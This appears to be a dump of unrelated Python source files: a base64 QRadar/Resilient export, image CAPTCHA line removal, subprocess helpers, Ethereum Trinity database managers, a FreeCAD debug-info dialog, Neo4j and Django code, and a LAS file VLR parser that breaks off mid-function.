ZXRfc2VhcmNoIl0sICJvYmplY3RfdHlwZSI6ICJpbmNpZGVudCIsICJ0aW1lb3V0X3NlY29uZHMi
OiA4NjQwMCwgInV1aWQiOiAiMzg3ZWMzN2ItOTExMS00MzhhLThjYzAtNDUyMWNjODNmMTAzIiwg
ImF1dG9tYXRpb25zIjogW10sICJleHBvcnRfa2V5IjogIkV4YW1wbGU6IFFSYWRhciBRdWVyeSIs
ICJjb25kaXRpb25zIjogW10sICJpZCI6IDE2OSwgIm1lc3NhZ2VfZGVzdGluYXRpb25zIjogW119
XSwgImxheW91dHMiOiBbXSwgImV4cG9ydF9mb3JtYXRfdmVyc2lvbiI6IDIsICJpZCI6IDU3LCAi
aW5kdXN0cmllcyI6IG51bGwsICJwaGFzZXMiOiBbXSwgImFjdGlvbl9vcmRlciI6IFtdLCAiZ2Vv
cyI6IG51bGwsICJsb2NhbGUiOiBudWxsLCAic2VydmVyX3ZlcnNpb24iOiB7Im1ham9yIjogMzIs
ICJ2ZXJzaW9uIjogIjMyLjAuNDUwMiIsICJidWlsZF9udW1iZXIiOiA0NTAyLCAibWlub3IiOiAw
fSwgInRpbWVmcmFtZXMiOiBudWxsLCAid29ya3NwYWNlcyI6IFtdLCAiYXV0b21hdGljX3Rhc2tz
IjogW10sICJmdW5jdGlvbnMiOiBbeyJkaXNwbGF5X25hbWUiOiAiUVJhZGFyIEFzc2V0IFF1ZXJ5
IiwgImRlc2NyaXB0aW9uIjogeyJjb250ZW50IjogIlRoaXMgZnVuY3Rpb24gaXMgYSBzaW1wbGUg
cXVlcnkgb2YgUVJhZGFyIGFzc2V0IGluZm9ybWF0aW9uLiBUaGlzIGp1c3QgZmluZHMgYWxsIGFz
c2V0cyB0aGF0IGNvbnRhaW5zIHBob25lIG51bWJlcnMgYW5kIGNvbnRhY3QgbmFtZSBhbmQgcmV0
dXJucyB0aGVtIHRvIGEgZGF0YSB0YWJsZS4iLCAiZm9ybWF0IjogInRleHQifSwgImNyZWF0b3Ii
OiB7ImRpc3BsYXlfbmFtZSI6ICJHZXJhbGQgVHJvdG1hbiIsICJ0eXBlIjogInVzZXIiLCAiaWQi
OiA0LCAibmFtZSI6ICJnZXJhbGQudHJvdG1hbkBpYm0uY29tIn0sICJ2aWV3X2l0ZW1zIjogW3si
c2hvd19pZiI6IG51bGwsICJmaWVsZF90eXBlIjogIl9fZnVuY3Rpb24iLCAic2hvd19saW5rX2hl
YWRlciI6IGZhbHNlLCAiZWxlbWVudCI6ICJmaWVsZF91dWlkIiwgImNvbnRlbnQiOiAiZWFkMjE0
YzItMTNmZS00M2Y2LWEzYzctNjc2YTg4MzM4ZGJiIiwgInN0ZXBfbGFiZWwiOiBudWxsfV0sICJl
eHBvcnRfa2V5IjogInFyYWRhcl9hc3NldF9xdWVyeSIsICJ1dWlkIjogIjlmN2UzMWY1LThlMTIt
NGEzNC05ZWFiLTU5ODgyYTI3YzlhYiIsICJsYXN0X21vZGlmaWVkX2J5IjogeyJkaXNwbGF5X25h
bWUiOiAiR2VyYWxkIFRyb3RtYW4iLCAidHlwZSI6ICJ1c2VyIiwgImlkIjogNCwgIm5hbWUiOiAi
Z2VyYWxkLnRyb3RtYW5AaWJtLmNvbSJ9LCAidmVyc2lvbiI6IDQsICJ3b3JrZmxvd3MiOiBbeyJk
ZXNjcmlwdGlvbiI6IG51bGwsICJvYmplY3RfdHlwZSI6ICJpbmNpZGVudCIsICJhY3Rpb25zIjog
W10sICJuYW1lIjogIkV4YW1wbGU6IFFSYWRhciBBc3NldCBTZWFyY2giLCAid29ya2Zsb3dfaWQi
OiAxNTQsICJwcm9ncmFtbWF0aWNfbmFtZSI6ICJleGFtcGxlX3FyYWRhcl9hc3NldF9zZWFyY2gi
LCAidXVpZCI6IG51bGx9XSwgImxhc3RfbW9kaWZpZWRfdGltZSI6IDE1NDcwNDIxMjgyOTAsICJk
ZXN0aW5hdGlvbl9oYW5kbGUiOiAicXJhZGFyIiwgImlkIjogMTcyLCAibmFtZSI6ICJxcmFkYXJf
YXNzZXRfcXVlcnkifV0sICJub3RpZmljYXRpb25zIjogbnVsbCwgInJlZ3VsYXRvcnMiOiBudWxs
LCAiaW5jaWRlbnRfdHlwZXMiOiBbeyJjcmVhdGVfZGF0ZSI6IDE1NDcwNTU2MzA5NjUsICJkZXNj
cmlwdGlvbiI6ICJDdXN0b21pemF0aW9uIFBhY2thZ2VzIChpbnRlcm5hbCkiLCAiZXhwb3J0X2tl
eSI6ICJDdXN0b21pemF0aW9uIFBhY2thZ2VzIChpbnRlcm5hbCkiLCAiaWQiOiAwLCAibmFtZSI6
ICJDdXN0b21pemF0aW9uIFBhY2thZ2VzIChpbnRlcm5hbCkiLCAidXBkYXRlX2RhdGUiOiAxNTQ3
MDU1NjMwOTY1LCAidXVpZCI6ICJiZmVlYzJkNC0zNzcwLTExZTgtYWQzOS00YTAwMDQwNDRhYTAi
LCAiZW5hYmxlZCI6IGZhbHNlLCAic3lzdGVtIjogZmFsc2UsICJwYXJlbnRfaWQiOiBudWxsLCAi
aGlkZGVuIjogZmFsc2V9XSwgInNjcmlwdHMiOiBbXSwgInR5cGVzIjogW3siZm9yX3dvcmtmbG93
cyI6IGZhbHNlLCAiZGlzcGxheV9uYW1lIjogIlFSYWRhciBBc3NldCBSZXN1bHRzIiwgInV1aWQi
OiAiN2RkMjE0MDEtZGQ2OC00NjE3LTljNmEtYWIxMmVkODc3ODlkIiwgInR5cGVfaWQiOiA4LCAi
ZmllbGRzIjogeyJhc3NldF9pZCI6IHsib3BlcmF0aW9ucyI6IFtdLCAidHlwZV9pZCI6IDEwMDIs
ICJvcGVyYXRpb25fcGVybXMiOiB7fSwgInRleHQiOiAiQXNzZXQgSWQiLCAiYmxhbmtfb3B0aW9u
IjogZmFsc2UsICJwcmVmaXgiOiBudWxsLCAiY2hhbmdlYWJsZSI6IHRydWUsICJpZCI6IDE5Miwg
InJlYWRfb25seSI6IGZhbHNlLCAidXVpZCI6ICIwZDkwOTYyYy1lMGNhLTQ3ODAtYTc5Mi0xNTgw
ZDE5MWMxYzMiLCAiY2hvc2VuIjogZmFsc2UsICJpbnB1dF90eXBlIjogInRleHQiLCAidG9vbHRp
cCI6ICIiLCAid2lkdGgiOiAxODMsICJpbnRlcm5hbCI6IGZhbHNlLCAicmljaF90ZXh0IjogZmFs
c2UsICJ0ZW1wbGF0ZXMiOiBbXSwgImV4cG9ydF9rZXkiOiAicXJhZGFyX2Fzc2V0X3Jlc3VsdHMv
YXNzZXRfaWQiLCAiaGlkZV9ub3RpZmljYXRpb24iOiBmYWxzZSwgInBsYWNlaG9sZGVyIjogIiIs
ICJuYW1lIjogImFzc2V0X2lkIiwgImRlcHJlY2F0ZWQiOiBmYWxzZSwgImRlZmF1bHRfY2hvc2Vu
X2J5X3NlcnZlciI6IGZhbHNlLCAidmFsdWVzIjogW10sICJvcmRlciI6IDB9LCAidGVjaG5pY2Fs
X2NvbnRhY3QiOiB7Im9wZXJhdGlvbnMiOiBbXSwgInR5cGVfaWQiOiAxMDAyLCAib3BlcmF0aW9u
X3Blcm1zIjoge30sICJ0ZXh0IjogIlRlY2huaWNhbCBDb250YWN0IiwgImJsYW5rX29wdGlvbiI6
IGZhbHNlLCAicHJlZml4IjogbnVsbCwgImNoYW5nZWFibGUiOiB0cnVlLCAiaWQiOiAxOTMsICJy
ZWFkX29ubHkiOiBmYWxzZSwgInV1aWQiOiAiMjExNjZiN2EtMmUzNi00MzVlLTg4MmMtYzhmZGEz
ZmQ5M2Q4IiwgImNob3NlbiI6IGZhbHNlLCAiaW5wdXRfdHlwZSI6ICJ0ZXh0IiwgInRvb2x0aXAi
OiAiIiwgIndpZHRoIjogMjU5LCAiaW50ZXJuYWwiOiBmYWxzZSwgInJpY2hfdGV4dCI6IGZhbHNl
LCAidGVtcGxhdGVzIjogW10sICJleHBvcnRfa2V5IjogInFyYWRhcl9hc3NldF9yZXN1bHRzL3Rl
Y2huaWNhbF9jb250YWN0IiwgImhpZGVfbm90aWZpY2F0aW9uIjogZmFsc2UsICJwbGFjZWhvbGRl
ciI6ICIiLCAibmFtZSI6ICJ0ZWNobmljYWxfY29udGFjdCIsICJkZXByZWNhdGVkIjogZmFsc2Us
ICJkZWZhdWx0X2Nob3Nlbl9ieV9zZXJ2ZXIiOiBmYWxzZSwgInZhbHVlcyI6IFtdLCAib3JkZXIi
OiAxfSwgInRlY2huaWNhbF9uYW1lIjogeyJvcGVyYXRpb25zIjogW10sICJ0eXBlX2lkIjogMTAw
MiwgIm9wZXJhdGlvbl9wZXJtcyI6IHt9LCAidGV4dCI6ICJUZWNobmljYWwgTmFtZSIsICJibGFu
a19vcHRpb24iOiBmYWxzZSwgInByZWZpeCI6IG51bGwsICJjaGFuZ2VhYmxlIjogdHJ1ZSwgImlk
IjogMTk0LCAicmVhZF9vbmx5IjogZmFsc2UsICJ1dWlkIjogImY0OWZjY2JjLWU1MmMtNGM1MC1i
MTBmLTJjODUxYjBmZThmNSIsICJjaG9zZW4iOiBmYWxzZSwgImlucHV0X3R5cGUiOiAidGV4dCIs
ICJ0b29sdGlwIjogIiIsICJ3aWR0aCI6IDIzMywgImludGVybmFsIjogZmFsc2UsICJyaWNoX3Rl
eHQiOiBmYWxzZSwgInRlbXBsYXRlcyI6IFtdLCAiZXhwb3J0X2tleSI6ICJxcmFkYXJfYXNzZXRf
cmVzdWx0cy90ZWNobmljYWxfbmFtZSIsICJoaWRlX25vdGlmaWNhdGlvbiI6IGZhbHNlLCAicGxh
Y2Vob2xkZXIiOiAiIiwgIm5hbWUiOiAidGVjaG5pY2FsX25hbWUiLCAiZGVwcmVjYXRlZCI6IGZh
bHNlLCAiZGVmYXVsdF9jaG9zZW5fYnlfc2VydmVyIjogZmFsc2UsICJ2YWx1ZXMiOiBbXSwgIm9y
ZGVyIjogMn19LCAicGFyZW50X3R5cGVzIjogWyJpbmNpZGVudCJdLCAidHlwZV9uYW1lIjogInFy
YWRhcl9hc3NldF9yZXN1bHRzIiwgImV4cG9ydF9rZXkiOiAicXJhZGFyX2Fzc2V0X3Jlc3VsdHMi
LCAiZm9yX2N1c3RvbV9maWVsZHMiOiBmYWxzZSwgImFjdGlvbnMiOiBbXSwgImlkIjogbnVsbCwg
ImZvcl9hY3Rpb25zIjogZmFsc2UsICJmb3Jfbm90aWZpY2F0aW9ucyI6IGZhbHNlLCAic2NyaXB0
cyI6IFtdLCAicHJvcGVydGllcyI6IHsiZm9yX3dobyI6IFtdLCAiY2FuX2Rlc3Ryb3kiOiBmYWxz
ZSwgImNhbl9jcmVhdGUiOiBmYWxzZX19XSwgIm1lc3NhZ2VfZGVzdGluYXRpb25zIjogW3sidXVp
ZCI6ICI5YzZkOGQyMy01NzdkLTQ5NGYtYmU1MS01ZDE3NDQ1NDRhNTkiLCAiZXhwb3J0X2tleSI6
ICJxcmFkYXIiLCAibmFtZSI6ICJRUmFkYXIiLCAiZGVzdGluYXRpb25fdHlwZSI6IDAsICJwcm9n
cmFtbWF0aWNfbmFtZSI6ICJxcmFkYXIiLCAiZXhwZWN0X2FjayI6IHRydWUsICJ1c2VycyI6IFsi
Z2VyYWxkLnRyb3RtYW5AaWJtLmNvbSJdfV0sICJpbmNpZGVudF9hcnRpZmFjdF90eXBlcyI6IFtd
LCAicm9sZXMiOiBbXSwgImZpZWxkcyI6IFt7Im9wZXJhdGlvbnMiOiBbXSwgInR5cGVfaWQiOiAw
LCAib3BlcmF0aW9uX3Blcm1zIjoge30sICJ0ZXh0IjogIlNpbXVsYXRpb24iLCAiYmxhbmtfb3B0
aW9uIjogZmFsc2UsICJwcmVmaXgiOiBudWxsLCAiY2hhbmdlYWJsZSI6IHRydWUsICJpZCI6IDM3
LCAicmVhZF9vbmx5IjogdHJ1ZSwgInV1aWQiOiAiYzNmMGUzZWQtMjFlMS00ZDUzLWFmZmItZmU1
Y2EzMzA4Y2NhIiwgImNob3NlbiI6IGZhbHNlLCAiaW5wdXRfdHlwZSI6ICJib29sZWFuIiwgInRv
b2x0aXAiOiAiV2hldGhlciB0aGUgaW5jaWRlbnQgaXMgYSBzaW11bGF0aW9uIG9yIGEgcmVndWxh
ciBpbmNpZGVudC4gIFRoaXMgZmllbGQgaXMgcmVhZC1vbmx5LiIsICJpbnRlcm5hbCI6IGZhbHNl
LCAicmljaF90ZXh0IjogZmFsc2UsICJ0ZW1wbGF0ZXMiOiBbXSwgImV4cG9ydF9rZXkiOiAiaW5j
aWRlbnQvaW5jX3RyYWluaW5nIiwgImhpZGVfbm90aWZpY2F0aW9uIjogZmFsc2UsICJuYW1lIjog
ImluY190cmFpbmluZyIsICJkZXByZWNhdGVkIjogZmFsc2UsICJkZWZhdWx0X2Nob3Nlbl9ieV9z
ZXJ2ZXIiOiBmYWxzZSwgInZhbHVlcyI6IFtdfSwgeyJvcGVyYXRpb25zIjogW10sICJ0eXBlX2lk
IjogMTEsICJvcGVyYXRpb25fcGVybXMiOiB7fSwgInRleHQiOiAiaW5jaWRlbnRfaWQiLCAiYmxh
bmtfb3B0aW9uIjogZmFsc2UsICJwcmVmaXgiOiBudWxsLCAiY2hhbmdlYWJsZSI6IHRydWUsICJp
ZCI6IDExNSwgInJlYWRfb25seSI6IGZhbHNlLCAidXVpZCI6ICJlYWQyMTRjMi0xM2ZlLTQzZjYt
YTNjNy02NzZhODgzMzhkYmIiLCAiY2hvc2VuIjogZmFsc2UsICJpbnB1dF90eXBlIjogIm51bWJl
ciIsICJ0b29sdGlwIjogIiIsICJpbnRlcm5hbCI6IGZhbHNlLCAicmljaF90ZXh0IjogZmFsc2Us
ICJ0ZW1wbGF0ZXMiOiBbXSwgImV4cG9ydF9rZXkiOiAiX19mdW5jdGlvbi9pbmNpZGVudF9pZCIs
ICJoaWRlX25vdGlmaWNhdGlvbiI6IGZhbHNlLCAicGxhY2Vob2xkZXIiOiAiIiwgIm5hbWUiOiAi
aW5jaWRlbnRfaWQiLCAiZGVwcmVjYXRlZCI6IGZhbHNlLCAiZGVmYXVsdF9jaG9zZW5fYnlfc2Vy
dmVyIjogZmFsc2UsICJ2YWx1ZXMiOiBbXX1dLCAib3ZlcnJpZGVzIjogW10sICJleHBvcnRfZGF0
ZSI6IDE1NDcwNDMyNDY3MTh9
"""
)
|
import numpy as np
from PIL import Image
class processed_image():
def __init__(self,path):
self.img = np.array(Image.open(path).convert('L'), 'f')
self.height,self.width = self.img.shape
self.all_lines = [set() for i in range(self.width)]
self.line = [-1] * self.width
def show_image(self):
img = self.img.astype('uint8')
img = Image.fromarray(img)
img.show()
img.save('type5_cutline.png')
def get_all_lines(self):
i = 0
while i < self.height:
if self.img[i][0] == 0:
line_size = 0
for j in range(5):
if self.img[i+j][0] != 0:
line_size = j
break
self.line = [-1] * self.width
self.line[0] = i
for j in range(line_size):
self.all_lines[0].add(i+j)
self.get_line(1,-1,line_size)
i = i + line_size
i = i + 1
self.remove_line()
# if self.img[i][self.width-1] == 0:
# self.line = [-1] * self.width
# self.line[self.width-1] = i
# self.get_line(self.width-2,1)
# self.remove_line()
def remove_line(self):
for index, i in enumerate(self.all_lines):
for j in i:
self.img[j][index] = 255
def get_line(self,n,num,line_size):
if n < self.width:
if self.line[n+num] > 0 and self.line[n+num] < self.height and self.img[self.line[n+num]][n] == 0 and self.img[self.line[n+num]+line_size-1][n] == 0:
self.line[n] = self.line[n+num]
# self.get_line(n-num,num,line_size)
elif self.line[n+num] > 0 and self.line[n+num] < self.height and self.img[self.line[n+num]-1][n] == 0 and self.img[self.line[n+num]-1+line_size-1][n] == 0:
self.line[n] = self.line[n+num] - 1
# self.get_line(n-num,num,line_size)
elif self.line[n+num] > 0 and self.line[n+num] < self.height and self.img[self.line[n+num]+1][n] == 0 and self.img[self.line[n+num]+1+line_size-1][n] == 0:
self.line[n] = self.line[n+num] + 1
# self.get_line(n-num,num,line_size)
for i in range(line_size):
self.all_lines[n].add(self.line[n]+i)
self.get_line(n - num, num, line_size)
path = '/Users/lvyufeng/Documents/captcha_train_set/type5_train/type5_train_19924.png'
img = processed_image(path)
img.show_image()
img.get_all_lines()
img.show_image()
|
import asyncio
import functools
import shlex
from typing import Tuple
async def runcmd(cmd: str) -> Tuple[str, str, int, int]:
args = shlex.split(cmd)
process = await asyncio.create_subprocess_exec(
*args, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
return (
stdout.decode("utf-8", "replace").strip(),
stderr.decode("utf-8", "replace").strip(),
process.returncode,
process.pid,
)
def run_sync(func, *args, **kwargs):
return asyncio.get_event_loop().run_in_executor(
None, functools.partial(func, *args, **kwargs)
)
def run_async(loop, coro):
return asyncio.run_coroutine_threadsafe(coro, loop).result()
# hellbot
|
def predict(text):
print(text)
return [1,0,0,1,1]
|
print("today is 2018-8-5 ")
|
# coding: utf-8
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import unittest
from auto_nag.mail import replaceUnicode
class TestMail(unittest.TestCase):
def test_replaceUnicode(self):
s = 'some letters and a é and a è, what else ?...'.decode('utf-8')
r = replaceUnicode(s)
assert r == 'some letters and a é and a è, what else ?...'
s = 'some letters and a é and a è'.decode('utf-8')
r = replaceUnicode(s)
assert r == 'some letters and a é and a è'
s = 'some letters with no accents, just pure ascii'.decode('utf-8')
r = replaceUnicode(s)
assert r == s
s = ''
r = replaceUnicode(s)
assert r == s
|
# Typeshed definitions for multiprocessing.managers is incomplete, so ignore them for now:
# https://github.com/python/typeshed/blob/85a788dbcaa5e9e9a62e55f15d44530cd28ba830/stdlib/3/multiprocessing/managers.pyi#L3
from multiprocessing.managers import ( # type: ignore
BaseManager,
)
import pathlib
from typing import Type
from eth import MainnetChain, RopstenChain
from eth.chains.base import BaseChain
from eth.db.backends.base import BaseAtomicDB
from trinity.chains.header import (
AsyncHeaderChain,
AsyncHeaderChainProxy,
)
from trinity.chains.proxy import ChainProxy
from trinity.config import TrinityConfig
from trinity.db.base import DBProxy
from trinity.db.chain import AsyncChainDB, ChainDBProxy
from trinity.db.header import (
AsyncHeaderDB,
AsyncHeaderDBProxy,
)
from trinity.initialization import (
is_database_initialized,
initialize_database,
)
from trinity.constants import (
MAINNET_NETWORK_ID,
ROPSTEN_NETWORK_ID,
)
from trinity.utils.mp import TracebackRecorder
def get_chaindb_manager(trinity_config: TrinityConfig, base_db: BaseAtomicDB) -> BaseManager:
chaindb = AsyncChainDB(base_db)
if not is_database_initialized(chaindb):
initialize_database(trinity_config, chaindb)
chain_class: Type[BaseChain]
chain: BaseChain
if trinity_config.network_id == MAINNET_NETWORK_ID:
chain_class = MainnetChain
chain = chain_class(base_db)
elif trinity_config.network_id == ROPSTEN_NETWORK_ID:
chain_class = RopstenChain
chain = chain_class(base_db)
else:
raise NotImplementedError("Only the ropsten and mainnet chains are supported")
headerdb = AsyncHeaderDB(base_db)
header_chain = AsyncHeaderChain(base_db)
class DBManager(BaseManager):
pass
# Typeshed definitions for multiprocessing.managers is incomplete, so ignore them for now:
# https://github.com/python/typeshed/blob/85a788dbcaa5e9e9a62e55f15d44530cd28ba830/stdlib/3/multiprocessing/managers.pyi#L3
DBManager.register( # type: ignore
'get_db', callable=lambda: TracebackRecorder(base_db), proxytype=DBProxy)
DBManager.register( # type: ignore
'get_chaindb',
callable=lambda: TracebackRecorder(chaindb),
proxytype=ChainDBProxy,
)
DBManager.register( # type: ignore
'get_chain', callable=lambda: TracebackRecorder(chain), proxytype=ChainProxy)
DBManager.register( # type: ignore
'get_headerdb',
callable=lambda: TracebackRecorder(headerdb),
proxytype=AsyncHeaderDBProxy,
)
DBManager.register( # type: ignore
'get_header_chain',
callable=lambda: TracebackRecorder(header_chain),
proxytype=AsyncHeaderChainProxy,
)
manager = DBManager(address=str(trinity_config.database_ipc_path)) # type: ignore
return manager
def create_db_manager(ipc_path: pathlib.Path) -> BaseManager:
"""
We're still using 'str' here on param ipc_path because an issue with
multi-processing not being able to interpret 'Path' objects correctly
"""
class DBManager(BaseManager):
pass
# Typeshed definitions for multiprocessing.managers is incomplete, so ignore them for now:
# https://github.com/python/typeshed/blob/85a788dbcaa5e9e9a62e55f15d44530cd28ba830/stdlib/3/multiprocessing/managers.pyi#L3
DBManager.register('get_db', proxytype=DBProxy) # type: ignore
DBManager.register('get_chaindb', proxytype=ChainDBProxy) # type: ignore
DBManager.register('get_chain', proxytype=ChainProxy) # type: ignore
DBManager.register('get_headerdb', proxytype=AsyncHeaderDBProxy) # type: ignore
DBManager.register('get_header_chain', proxytype=AsyncHeaderChainProxy) # type: ignore
manager = DBManager(address=str(ipc_path)) # type: ignore
return manager
|
import FreeCAD
import FreeCADGui as Gui
try:
# ############################################################################
# This part of code has been created by Werner Mayer (wmayer) at forum:
# https://forum.freecadweb.org/viewtopic.php?p=187448#p187448
# ############################################################################
from PySide import QtCore
from PySide import QtGui
class AboutInfo(QtCore.QObject):
def eventFilter(self, obj, ev):
if obj.metaObject().className() == "Gui::Dialog::AboutDialog":
if ev.type() == ev.ChildPolished:
mo = obj.metaObject()
index = mo.indexOfMethod("on_copyButton_clicked()")
if index > 0:
mo.invokeMethod(obj, "on_copyButton_clicked")
QtGui.qApp.postEvent(obj, QtGui.QCloseEvent())
return False
ai=AboutInfo()
QtGui.qApp.installEventFilter(ai)
Gui.runCommand("Std_About")
QtGui.qApp.removeEventFilter(ai)
# ############################################################################
# by Darek L aka dprojects below:
# ############################################################################
def showQtGUI():
class QtMainClass(QtGui.QDialog):
def __init__(self):
super(QtMainClass, self).__init__()
self.initUI()
def initUI(self):
# main window
self.result = userCancelled
self.setGeometry(450, 100, 410, 500)
self.setWindowTitle("Platform details for bug report")
self.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint)
# output
Info = ""
Info += "Has been copied to clipboard: \n"
self.oInfo1 = QtGui.QLabel(Info, self)
self.oInfo1.move(5, 10)
self.o = QtGui.QTextEdit(self)
self.o.setMinimumSize(400, 350)
self.o.setMaximumSize(400, 350)
self.o.move(5, 40)
self.o.setPlainText("")
self.o.paste()
Info = ""
Info += "Note: \n\n"
Info += "CTRL-V - to paste it at your forum topic \n\n"
Info += "CTRL-A, CTRL-C - to copy again"
self.oInfo2 = QtGui.QLabel(Info, self)
self.oInfo2.move(5, 400)
# show
self.show()
userCancelled = "Cancelled"
userOK = "OK"
form = QtMainClass()
form.exec_()
if form.result == userCancelled:
pass
# ###################################################################################################################
# MAIN
# ###################################################################################################################
showQtGUI()
except:
import FreeCAD, FreeCADGui
from PySide import QtGui
from PySide import QtCore
info = ''
info += 'There is error during getting debug information.' + ' '
info += 'It probably means <span style="color:red;">Your FreeCAD installation is incorrect.</span>' + ' '
info += 'Try the newest FreeCAD AppImage.' + '<br><br><br>'
info += 'If You are using Ubuntu 22.04 LTS You may have to rebuild the AppImage:' + '<br>'
info += '<div style="background-color: #DDDDFF;margin:15px;">'
info += 'chmod +x ./FreeCAD_weekly-build' + '<br>'
info += './FreeCAD_weekly-build --appimage-extract' + '<br>'
info += 'rm -rf ./squashfs-root/usr/lib/libstdc++.so.6' + '<br>'
info += 'rm -rf ./squashfs-root/usr/lib/libstdc++.so' + '<br>'
info += '<a href="https://appimage.github.io/appimagetool/">appimagetool-x86_64.AppImage</a> ./squashfs-root'
info += '</div>'
info += '<br><br><br><br>'
info += 'For more details please see:' + ' '
info += '<a href="https://forum.freecadweb.org/viewtopic.php?p=590997#p590997">FreeCAD forum thread.</a>'
msg = QtGui.QMessageBox()
msg.setTextFormat(QtCore.Qt.TextFormat.RichText)
msg.setText(info)
msg.exec_()
|
def test_num(test):
test_set = [11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
for num in test_set:
if test % num != 0:
return False
return True
for x in range(2520, 10000000000, 2520):
if test_num(x):
print("Answer 5:", x)
break
|
from neo4jrestclient.client import GraphDatabase
class Database(object):
def __init__(self, uri, user, password_):
self.db = GraphDatabase(uri, username=user, password=password_)
def close(self):
self.db.close()
def _create_node(self,_label,_name):
# Create one node without relationship
node = self.db.labels.create(_label)
n1 = self.db.nodes.create(name=_name)
node.add(n1)
def _create_two_nodes(self,_label1,_name1,_label2,_name2,_relationship):
# Create some nodes with labels and relationship between then
node_1 = self.db.labels.create(_label1)
node_2 = self.db.labels.create(_label2)
n1 = self.db.nodes.create(name=_name1)
node_1.add(n1)
n2 = self.db.nodes.create(name=_name2)
node_2.add(n2)
n1.relationships.create(_relationship,n2)
|
# Utilities
#
# Copyright (c) 2012, Gustav Tiger <gustav@tiger.name>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from __future__ import absolute_import, print_function
import errno
import os
import subprocess
import threading
class Runner:
def __init__(self, directory):
self.directory = directory
# TODO: loop over scripts, check if they are runnable, warn
# then don't warn at runtime.
def get_scripts(self):
scripts = []
for _, _, filenames in os.walk(self.directory):
for filename in filenames:
scripts.append(filename)
return sorted(scripts)
def _run_action(self, action, filename, fit_type):
for script in self.get_scripts():
try:
subprocess.call([os.path.join(self.directory, script),
action, filename, str(fit_type)])
except OSError as e:
print(" - Could not run", script, "-", \
errno.errorcode[e.errno], os.strerror(e.errno))
def run_action(self, action, filename, fit_type):
t = threading.Thread(target=self._run_action, args=(action, filename, fit_type))
t.start()
def run_download(self, filename, fit_type):
self.run_action("DOWNLOAD", filename, fit_type)
def run_upload(self, filename, fit_type):
self.run_action("UPLOAD", filename, fit_type)
def run_delete(self, filename, fit_type):
self.run_action("DELETE", filename, fit_type)
|
import logging
from django.http import Http404
from django.shortcuts import render_to_response
from gibbs.forms import CompoundForm
from gibbs import reaction
from gibbs import conditions
def CompoundPage(request):
"""Renders a page for a particular compound."""
form = CompoundForm(request.GET)
if not form.is_valid():
logging.error(form.errors)
raise Http404
aq_params = conditions.AqueousParams.FromForm(form, request.COOKIES)
rxn = reaction.Reaction.FromForm(form, aq_params)
if len(rxn.reactants) != 1:
logging.error('There must be only 1 reactant in a "compound" page')
raise Http404
compound = rxn.reactants[0].compound
logging.info('Submit = ' + form.cleaned_submit)
if form.cleaned_submit == 'Reset':
logging.info('resetting conditions')
rxn.aq_params = conditions.AqueousParams()
rxn.ResetConcentrations()
compound.StashTransformedSpeciesEnergies(rxn.aq_params)
query = compound.FirstName()
template_data = rxn.GetTemplateData(query)
template_data.update({'compound': compound,
'alberty_link': compound.GetNewPriorityLink(99),
'cc_link': compound.GetNewPriorityLink(1)})
response = render_to_response('compound_page.html', template_data)
rxn.aq_params.SetCookies(response)
return response
|
import ctypes
from .. import utils
NULL_BYTE = b"\x00"
class RawVLRHeader(ctypes.LittleEndianStructure):
""" Close representation of a VLR Header as it is written
in the LAS file.
"""
_fields_ = [
("_reserved", ctypes.c_uint16),
("user_id", ctypes.c_char * 16),
("record_id", ctypes.c_uint16),
("record_length_after_header", ctypes.c_uint16),
("description", ctypes.c_char * 32),
]
@classmethod
def from_stream(cls, stream):
return cls.from_buffer(bytearray(stream.read(ctypes.sizeof(cls))))
VLR_HEADER_SIZE = ctypes.sizeof(RawVLRHeader)
MAX_VLR_RECORD_DATA_LEN = utils.ctypes_max_limit(
RawVLRHeader.record_length_after_header.size
)
class RawVLR:
""" As close as possible to the underlying data
No parsing of the record_data is made,
every piece of data are still bytes.
"""
def __init__(self):
self.header = RawVLRHeader()
self.record_data = b""
@property
def record_data(self):
return self._record_data
@record_data.setter
def record_data(self, value):
if len(value) > MAX_VLR_RECORD_DATA_LEN:
raise OverflowError(
"VLR record data length ({}) exceeds maximum ({})".format(
len(value), MAX_VLR_RECORD_DATA_LEN
)
)
self.header.record_length_after_header = len(value)
self._record_data = value
def size_in_bytes(self):
return VLR_HEADER_SIZE + self.header.record_length_after_header
def write_to(self, out):
""" Write the raw header content to the out stream
Parameters:
----------
out : {file object}
The output stream
"""
out.write(bytes(self.header))
out.write(self.record_data)
@classmethod
def read_from(cls, data_stream):
""" Instantiate a RawVLR by reading the content from the
data stream
Parameters:
----------
data_stream : {file object}
The input stream
Returns
-------
RawVLR
The RawVLR read
"""
raw_vlr = cls()
header = RawVLRHeader.from_stream(data_stream)
raw_vlr.header = header
raw_vlr.record_data = data_stream.read(header.record_length_after_header)
return raw_vlr
def __repr__(self):
return "<RawVLR(user_id: {}, record_id: {}, len: {})>".format(
self.header.user_id,
self.header.record_id,
self.header.record_length_after_header,
)
class BaseVLR:
def __init__(self, user_id, record_id, description=""):
self.user_id = user_id
self.record_id = record_id
self.description = description
class VLR(BaseVLR):
def __init__(self, user_id, record_id, description=""):
super().__init__(user_id, record_id, description=description)
self.record_data = b""
def record_data_bytes(self):
return self.record_data
@classmethod
def from_raw(cls, raw_vlr):
vlr = cls(
raw_vlr.header.user_id.rstrip(NULL_BYTE).decode(),
raw_vlr.header.record_id,
